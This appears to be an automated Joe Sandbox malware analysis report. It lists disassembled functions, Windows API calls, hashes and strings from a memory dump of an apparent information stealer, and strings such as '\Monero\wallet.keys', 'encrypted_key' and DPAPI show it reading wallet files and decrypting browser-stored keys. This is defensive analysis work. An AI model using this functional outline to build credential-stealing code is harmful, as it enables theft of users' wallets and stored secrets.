                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                • Instruction ID: f04fc69fbe30e0bccd10caf7b993fddd4b57d1c4bc99ad49986d468c465dba4b
                                • Opcode Fuzzy Hash: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                • Instruction Fuzzy Hash: 0D812E728501089BEB04FBA1DC96EEE7338FF54304F554528F407B6092EF346A49EBA2
                                Function 00C3F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C51580,00C50D92), ref: 00C3F54C
                                • lstrlen.KERNEL32(00000000), ref: 00C3F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 1e476ab8d7d0bd48c93b396a5dea98538ee34b9c98bde0cab58ebeb4974e55e2
                                • Instruction ID: af261310c5c3a5a77d9b7c54125c4e5e3a1d0a6b85725219e5bff4930ca2f9ab
                                • Opcode Fuzzy Hash: 1e476ab8d7d0bd48c93b396a5dea98538ee34b9c98bde0cab58ebeb4974e55e2
                                • Instruction Fuzzy Hash: 5B512076D50108AAEB14FBB0DC96EED7338FF54304F508528F816A7191EE346A0DDBA2
                                Function 00C43560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: debb1566baa97ce123c18f01488e51d43b305b290b341d96f6b057c8fcd9c629
                                • Instruction ID: f365d59d77cd242cf1ab20980e89586a72a8bf7ad9f570503d9d44fff64cbe04
                                • Opcode Fuzzy Hash: debb1566baa97ce123c18f01488e51d43b305b290b341d96f6b057c8fcd9c629
                                • Instruction Fuzzy Hash: 26414F75D10109AFDB04EFE5D845AEEB774BF94304F108028F416B6291DB34AA49DFA2
                                Function 00C39CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                  • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                  • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                  • Part of subcall function 00C39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                  • Part of subcall function 00C39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                  • Part of subcall function 00C39B60: LocalFree.KERNEL32(?), ref: 00C39BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5be1af16dde599473640e5b7d37a751ea3a6ba4bb955170a50733438210a46c2
                                • Instruction ID: 4748fd46819bec1a2ce0d2d3f296f1019f13b5f46a40b483dc2b4ceb460e0311
                                • Opcode Fuzzy Hash: 5be1af16dde599473640e5b7d37a751ea3a6ba4bb955170a50733438210a46c2
                                • Instruction Fuzzy Hash: B93132B6D10209ABCF14EFE4DC86AEFB7B8FF48304F144519E915A7241E7749A44CBA1
                                Function 00C494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C494EB
                                  • Part of subcall function 00C48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                  • Part of subcall function 00C48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                  • Part of subcall function 00C48D50: wsprintfW.USER32 ref: 00C48D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C495AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C495C9
                                • CloseHandle.KERNEL32(00000000), ref: 00C495D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                • Instruction ID: 217f20c566fcb40dc5695c63ba5f6b11441086eadb25ffc7049aab12cc860e70
                                • Opcode Fuzzy Hash: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                • Instruction Fuzzy Hash: C3312D71E002189FDB14DFD0DD49BEEB778FB44301F204559E50AAB184DB74AA89DF52
                                Function 00C492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00C43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C43AEE,?), ref: 00C492FC
                                • GetFileSizeEx.KERNEL32(000000FF,00C43AEE), ref: 00C49319
                                • CloseHandle.KERNEL32(000000FF), ref: 00C49327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                • Instruction ID: 2277789b53770941a03dd3b35199270ebae4cf68e187e099538ad6f4d8a757f7
                                • Opcode Fuzzy Hash: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                • Instruction Fuzzy Hash: C4F08C34E00208BBDB14DFB2DC09F9E77B9FB88310F108264F615A72D0D6B09A408B40
                                Function 00C4C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00C4C74E
                                  • Part of subcall function 00C4BF9F: __amsg_exit.LIBCMT ref: 00C4BFAF
                                • __getptd.LIBCMT ref: 00C4C765
                                • __amsg_exit.LIBCMT ref: 00C4C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00C4C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                • Instruction ID: 994f39696713609104a44481666c284bf6efe334322f166e93afc557959fc58e
                                • Opcode Fuzzy Hash: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                • Instruction Fuzzy Hash: AEF0B4369427009BE760BBF8588775E37A07F00721F204149F814A61E3DB649D80BE56
                                Function 00C44F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44F7A
                                • lstrcat.KERNEL32(?,00C51070), ref: 00C44F97
                                • lstrcat.KERNEL32(?,019F8958), ref: 00C44FAB
                                • lstrcat.KERNEL32(?,00C51074), ref: 00C44FBD
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                  • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                  • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                  • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                • Instruction ID: 52b1df0c69e02c2933c3781432a8111e84693c638d8ab6839c414c0d62f55108
                                • Opcode Fuzzy Hash: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                • Instruction Fuzzy Hash: ED219876900208AFD754FBB0DC46EED333CBB94701F044564BA5DA2181EE749ACC9BA3